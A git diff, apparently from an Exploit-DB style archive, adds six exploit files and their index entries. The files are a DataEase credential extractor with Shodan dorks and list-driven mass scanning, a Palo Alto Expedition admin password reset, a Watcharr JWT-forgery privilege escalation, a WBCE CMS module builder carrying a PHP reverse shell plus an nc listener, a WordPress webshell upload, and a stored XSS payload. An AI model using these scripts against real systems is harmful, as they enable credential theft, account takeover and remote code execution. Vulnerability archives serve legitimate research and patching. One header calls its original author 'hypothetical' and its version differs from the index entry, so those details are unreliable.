diff --git a/exploits/java/webapps/52128.py b/exploits/java/webapps/52128.py new file mode 100755 index 000000000..987dcfdbc --- /dev/null +++ b/exploits/java/webapps/52128.py @@ -0,0 +1,93 @@ +################################################################ +############################ # +#- Exploit Title: DataEase Database Creds Extractor # +#- Shodan Dork: http.html:"dataease" # +#- FOFA Dork: body="dataease" && title=="DataEase" # +#- Exploit Author: ByteHunter # +#- Email: 0xByteHunter@proton.me # +#- vulnerable Versions: 2.4.0-2.5.0 # +#- Tested on: 2.4.0 # +#- CVE : CVE-2024-30269 # +############################ # +################################################################ + +import argparse +import requests +import re +import json +from tqdm import tqdm + +def create_vulnerability_checker(): + vulnerable_count = 0 + + def check_vulnerability(url): + nonlocal vulnerable_count + endpoint = "/de2api/engine/getEngine;.js" + full_url = f"{url}{endpoint}" + headers = { + "Host": url.split('/')[2], + "Accept-Encoding": "gzip, deflate, br", + "Accept": "*/*", + "Accept-Language": "en-US;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36", + "Connection": "close", + "Cache-Control": "max-age=0" + } + + try: + response = requests.get(full_url, headers=headers, timeout=5) + if response.status_code == 200: + try: + json_data = response.json() + config = json_data.get("data", {}).get("configuration", None) + + if config: + config_data = json.loads(config) + + username = config_data.get("username") + password = config_data.get("password") + port = config_data.get("port") + + if username and password: + vulnerable_count += 1 + print(f"Vulnerable: {full_url}") + print(f"Username: {username}") + print(f"Password: {password}") + if port is not None: + print(f"Port Number: {port}") + + except (json.JSONDecodeError, KeyError): + print(f"Invalid JSON response from {full_url}") + + except requests.RequestException: + pass + + return vulnerable_count + + return check_vulnerability + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor") + parser.add_argument('-u', '--url', type=str, help='Single target') + parser.add_argument('-l', '--list', type=str, help='URL File List') + args = parser.parse_args() + + check_vulnerability = create_vulnerability_checker() + + if args.url: + check_vulnerability(args.url) + elif args.list: + try: + with open(args.list, 'r') as file: + urls = [url.strip() for url in file.readlines() if url.strip()] + total_urls = len(urls) + for url in tqdm(urls, desc="Processing URLs", unit="url"): + check_vulnerability(url) + # tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}") + except FileNotFoundError: + print(f"File not found: {args.list}") + else: + print("provide a URL with -u or a file with -l.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52129.py b/exploits/multiple/webapps/52129.py new file mode 100755 index 000000000..5970f5fcc --- /dev/null +++ b/exploits/multiple/webapps/52129.py @@ -0,0 +1,57 @@ +################################################################################################ +############################ # +#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool # +#- Shodan Dork: html:"expedition project" # +#- FOFA Dork: "expedition project" && icon_hash="1499876150" # +#- Exploit Author: ByteHunter # +#- Email: 0xByteHunter@proton.me # +#- Vulnerable Versions: 1.2 < 1.2.92 # +#- Tested on: 1.2.90.1 & 1.2.75 # +#- CVE : CVE-2024-5910 # +############################ # +################################################################################################ + +import requests +import argparse +import warnings + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +warnings.simplefilter("ignore", InsecureRequestWarning) + +ENDPOINT = '/OS/startup/restore/restoreAdmin.php' + +def send_request(base_url): + url = f"{base_url}{ENDPOINT}" + print(f"Testing URL: {url}") + try: + response = requests.get(url, verify=False, timeout=7) + if response.status_code == 200: + print("✓ Admin password restored to: 'paloalto'\n") + print("✓ admin panel is now accessable via ==> admin:paloalto creds") + else: + print(f"Request failed with status code: {response.status_code}\n") + except requests.exceptions.RequestException as e: + print(f"Error sending request to {url}") #{e} + +def main(): + parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC') + parser.add_argument('-u', '--url', type=str, help='single target URL') + parser.add_argument('-l', '--list', type=str, help='URL target list') + + args = parser.parse_args() + + if args.url: + send_request(args.url) + elif args.list: + try: + with open(args.list, 'r') as file: + urls = file.readlines() + for base_url in urls: + send_request(base_url.strip()) + except FileNotFoundError: + print(f"File not found: {args.list}") + else: + print("I need a URL address with -u or a URL file list with -l.") + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52130.py b/exploits/multiple/webapps/52130.py new file mode 100755 index 000000000..8e46e7d03 --- /dev/null +++ b/exploits/multiple/webapps/52130.py @@ -0,0 +1,108 @@ +# CVE-2024-48827 exploit by Suphawith Phusanbai +# Affected Watcharr version 1.43.0 and below. +import argparse +import requests +import json +import jwt +from pyfiglet import Figlet + +f = Figlet(font='slant',width=100) +print(f.renderText('CVE-2024-48827')) + +#store JWT token and UserID \ เก็บ token กับ UserID +jwt_token = None +user_id = None + +#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token +def login(host, port, username, password): + url = f'http://{host}:{port}/api/auth/' + #payload in login API request \ payload ใน json + payload = { + 'username': username, + 'password': password + } + + headers = { + 'Content-Type': 'application/json' + } + #login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object + try: + response = requests.post(url, data=json.dumps(payload), headers=headers) + if response.status_code == 200: + token = response.json().get('token') + if token: + print(f"[+] SUCCESS! JWT Token: {token}") + global jwt_token + jwt_token = token + + #decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object + decoded_payload = jwt.decode(token, options={"verify_signature": False}) + global user_id + user_id = decoded_payload.get('userId') + + return token + else: + print("[-] Check your password again!") + else: + print(f"[-] Failed :(") + print(f"Response: {response.text}") + except Exception as e: + print(f"Error! HTTP response code: {e}") + +#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน +def create_new_jwt(original_token): + try: + decoded_payload = jwt.decode(original_token, options={"verify_signature": False}) + #userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ + decoded_payload['userId'] = 1 + new_token = jwt.encode(decoded_payload, '', algorithm='HS256') + print(f"[+] New JWT Token: {new_token}") + return new_token + except Exception as e: + print(f"[-] Failed to create new JWT: {e}") + +#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token +def privilege_escalation(host, port, adminuser, token): + #specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin + url = f'http://{host}:{port}/api/server/users/{user_id}' + + # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3 + payload = { + "permissions": 3 + } + + headers = { + 'Authorization': f'{token}', + 'Content-Type': 'application/json' + } + + try: + response = requests.post(url, data=json.dumps(payload), headers=headers) + if response.status_code == 200: + print(f"[+] Privilege Escalation Successful! The current user is now an admin!") + else: + print(f"[-] Failed to escalate privileges. Response: {response.text}") + except Exception as e: + print(f"Error during privilege escalation: {e}") + + +#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin +#usage +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.') + parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True) + parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080) + parser.add_argument('-u', '--username', type=str, help='Username for login', required=True) + parser.add_argument('-p', '--password', type=str, help='Password for login', required=True) + parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True) + args = parser.parse_args() + + #step 1: login + token = login(args.host, args.port, args.username, args.password) + + #step 2: craft the admin token + if token: + new_token = create_new_jwt(token) + #step 3: Escalate privileges with crafted token. Enjoy! + if new_token: + privilege_escalation(args.host, args.port, args.adminuser, new_token) \ No newline at end of file diff --git a/exploits/multiple/webapps/52132.sh b/exploits/multiple/webapps/52132.sh new file mode 100755 index 000000000..76ea6f601 --- /dev/null +++ b/exploits/multiple/webapps/52132.sh @@ -0,0 +1,199 @@ +# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE) +# Date: 3/22/2025 +# Exploit Author: Swammers8 +# Vendor Homepage: https://wbce-cms.org/ +# Software Link: https://github.com/WBCE/WBCE_CMS +# Version: 1.6.3 and prior +# Tested on: Ubuntu 24.04.2 LTS +# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e +# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE + +#!/bin/bash + +# Make a zip file exploit +# Start netcat listener + +if [[ $# -ne 2 ]]; then + echo "[*] Description:" + echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3" + echo "[*] It will create an infected module .zip file and start a netcat listener." + echo "[*] Once the zip is created, you will have to login to the admin page" + echo "[*] to upload and install the module, which will immediately run the shell" + echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master" + echo "[!] Usage:" + echo "[*] $0 " + exit 1 +fi + +if [ -z "$(which nc)" ]; then + echo "[!] Netcat is not installed." + exit 1 +fi + +ip=$1 +port=$2 + +rm -rf shellModule.zip +rm -rf shellModule +mkdir shellModule + +echo [*] Crafting Payload + +cat < shellModule/info.php + +EOF + +cat < shellModule/install.php + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +\$process = proc_open(\$shell, \$descriptorspec, \$pipes); + +if (!is_resource(\$process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +stream_set_blocking(\$pipes[0], 0); +stream_set_blocking(\$pipes[1], 0); +stream_set_blocking(\$pipes[2], 0); +stream_set_blocking(\$sock, 0); + +printit("Successfully opened reverse shell to \$ip:\$port"); + +while (1) { + if (feof(\$sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + if (feof(\$pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + \$read_a = array(\$sock, \$pipes[1], \$pipes[2]); + \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null); + + if (in_array(\$sock, \$read_a)) { + if (\$debug) printit("SOCK READ"); + \$input = fread(\$sock, \$chunk_size); + if (\$debug) printit("SOCK: \$input"); + fwrite(\$pipes[0], \$input); + } + + if (in_array(\$pipes[1], \$read_a)) { + if (\$debug) printit("STDOUT READ"); + \$input = fread(\$pipes[1], \$chunk_size); + if (\$debug) printit("STDOUT: \$input"); + fwrite(\$sock, \$input); + } + + if (in_array(\$pipes[2], \$read_a)) { + if (\$debug) printit("STDERR READ"); + \$input = fread(\$pipes[2], \$chunk_size); + if (\$debug) printit("STDERR: \$input"); + fwrite(\$sock, \$input); + } +} + +fclose(\$sock); +fclose(\$pipes[0]); +fclose(\$pipes[1]); +fclose(\$pipes[2]); +proc_close(\$process); + +function printit (\$string) { + if (!\$daemon) { + print "\$string\n"; + } +} + +?> +EOF + +echo [*] Zipping to shellModule.zip +zip -r shellModule.zip shellModule +rm -rf shellModule +echo [*] Please login to the WBCE admin panel to upload and install the module +echo [*] Starting listener + +nc -lvnp $port + +echo +echo +echo "[*] Done!" +echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page" \ No newline at end of file diff --git a/exploits/php/webapps/52131.py b/exploits/php/webapps/52131.py new file mode 100755 index 000000000..3e63cf983 --- /dev/null +++ b/exploits/php/webapps/52131.py @@ -0,0 +1,93 @@ +# Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE +# Original Author: Patchstack (hypothetical) +# Exploit Author: Al Baradi Joy +# Exploit Date: April 5, 2025 +# Vendor Homepage: https://wp-timecapsule.com/ +# Software Link: https://wordpress.org/plugins/wp-time-capsule/ +# Version: Up to and including 1.21.16 +# Tested Versions: 1.21.16 +# CVE ID: CVE-2024-8856 +# Vulnerability Type: Arbitrary File Upload / Remote Code Execution +# Description: +# The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16 +# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint. +# This can lead to remote code execution if a PHP file is uploaded and executed directly +# from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory. +# Proof of Concept: Yes +# Categories: WordPress Plugin, File Upload, RCE +# CVSS Score: 9.9 (Critical) +# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +# Notes: +# Successful exploitation provides shell access as the user running the web server. +# Ensure target is using the vulnerable plugin version before launching the attack. + +import requests + +# Banner +def display_banner(): +print("="*80) +print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging +Plugin Arbitrary File Upload") +print("Made By Al Baradi Joy") +print("="*80) + +# Function to detect if the target supports HTTPS or falls back to HTTP +def detect_protocol(domain): +https_url = f"https://{domain}" +http_url = f"http://{domain}" + +try: +response = requests.get(https_url, timeout=5, allow_redirects=True) +if response.status_code < 400: +print(f"[✔] Target supports HTTPS: {https_url}") +return https_url +except requests.exceptions.RequestException: +print("[!] HTTPS not available, falling back to HTTP.") + +try: +response = requests.get(http_url, timeout=5, allow_redirects=True) +if response.status_code < 400: +print(f"[✔] Target supports HTTP: {http_url}") +return http_url +except requests.exceptions.RequestException: +print("[✖] Target is unreachable on both HTTP and HTTPS.") +exit(1) + +# Exploit function +def exploit(target_url): +target_url = detect_protocol(target_url.replace("http://", +"").replace("https://", "").strip()) +upload_url = +f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php" +shell_url = +f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami" + +files = { +'file': ('shell.php', '', +'application/x-php') +} + +try: +print(f"[+] Attempting to upload shell to: {upload_url}") +response = requests.post(upload_url, files=files, timeout=10) + +if response.status_code == 200: +print(f"[✔] Exploit successful! Webshell available at: +{shell_url}") +else: +print(f"[✖] Failed to upload shell. Status code: +{response.status_code}") + +except requests.exceptions.ConnectionError: +print("[✖] Connection failed. Target may be down.") +except requests.exceptions.Timeout: +print("[✖] Request timed out. Target is slow or unresponsive.") +except requests.exceptions.RequestException as e: +print(f"[✖] Unexpected error: {e}") + +# Main execution +if __name__ == "__main__": +display_banner() +target = input("[?] Enter the target URL (without http/https): +").strip() +exploit(target) \ No newline at end of file diff --git a/exploits/php/webapps/52133.txt b/exploits/php/webapps/52133.txt new file mode 100644 index 000000000..034865e31 --- /dev/null +++ b/exploits/php/webapps/52133.txt @@ -0,0 +1,23 @@ +# Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS +# Date: 2024-10-01 +# Exploit Author: Ilteris Kaan Pehlivan +# Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/ +# Version: Reservit Hotel 2.1 +# Tested on: Windows, WordPress, Reservit Hotel < 3.0 +# CVE : CVE-2024-9458 + +The plugin does not sanitise and escape some of its settings, which could +allow high privilege users such as admin to perform Stored Cross-Site +Scripting attacks even when the unfiltered_html capability is disallowed +(for example in multisite setup). + +1. Install and activate Reservit Hotel plugin. +2. Go to Reservit hotel > Content +3. Add the following payload to the Button text > French field sane save: " +style=animation-name:rotation onanimationstart=alert(/XSS/)// +4. The XSS will trigger upon saving and when any user will access the +content dashboard again + +References: +https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/ +https://www.cve.org/CVERecord?id=CVE-2024-9458 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bce053265..49e50baa9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5513,6 +5513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",2022-06-10,"Fellipe Oliveira",webapps,java,,2022-06-10,2022-06-10,0,CVE-2022-26134,,,,, 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,"Fellipe Oliveira",webapps,java,,2021-09-01,2021-09-01,0,CVE-2021-26084,,,,, 36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,webapps,java,,2012-01-13,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51404/info +52128,exploits/java/webapps/52128.py,"DataEase 2.4.0 - Database Configuration Information Exposure",2025-04-06,ByteHunter,webapps,java,,2025-04-06,2025-04-06,0,CVE-2024-30269,,,,, 33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,webapps,java,,2009-05-19,2014-04-27,1,CVE-2009-2216;OSVDB-55296,,,,,https://www.securityfocus.com/bid/35450/info 34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",webapps,java,,2010-07-12,2014-08-08,1,,,,,,https://www.securityfocus.com/bid/41541/info 33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java,,2009-10-14,2014-05-10,1,CVE-2009-4521;OSVDB-58941,,,,,https://www.securityfocus.com/bid/36674/info @@ -12192,6 +12193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,, 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,, +52129,exploits/multiple/webapps/52129.py,"Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover",2025-04-06,ByteHunter,webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-5910,,,,, 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,, 51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,, 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt @@ -12378,6 +12380,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",webapps,multiple,,2010-05-13,,1,CVE-2010-1143,,,,, 48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,,2020-09-11,2020-09-11,0,,,,,, 10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,multiple,,2010-01-03,,0,OSVDB-63644,,,,http://www.exploit-db.comw-agora-4.2.1-php.zip, +52130,exploits/multiple/webapps/52130.py,"Watcharr 1.43.0 - Remote Code Execution (RCE)",2025-04-06,"Suphawith Phusanbai",webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-48827,,,,, +52132,exploits/multiple/webapps/52132.sh,"WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)",2025-04-06,Swammers8,webapps,multiple,,2025-04-06,2025-04-06,0,,,,,, 31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42927,,,,,https://www.securityfocus.com/bid/27875/info 31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info 50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,, @@ -14638,6 +14642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info +52131,exploits/php/webapps/52131.py,"Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload",2025-04-06,"Al Baradi Joy",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-8856,,,,, 37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info 15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68598;CVE-2010-4801,,,http://www.exploit-db.com/screenshots/idlt15500/screen.png,http://www.exploit-db.combaconmap1Duroc.zip, 15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68599;CVE-2010-4800,,,,http://www.exploit-db.combaconmap1Duroc.zip, @@ -29018,6 +29023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-46843;CVE-2008-2964,,,,, 19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,php,,2012-07-12,2012-07-12,0,CVE-2010-4980;OSVDB-83844;OSVDB-83842;OSVDB-83841;OSVDB-83840;OSVDB-83839;OSVDB-83838;OSVDB-83837;OSVDB-83836;OSVDB-83835;OSVDB-83834;OSVDB-83833;OSVDB-83832;OSVDB-83831;OSVDB-83830;OSVDB-83829;OSVDB-83828;OSVDB-83827;OSVDB-65952,,,,,https://www.vulnerability-lab.com/get_content.php?id=617 46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,, +52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,, 43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,, 48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,, 35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,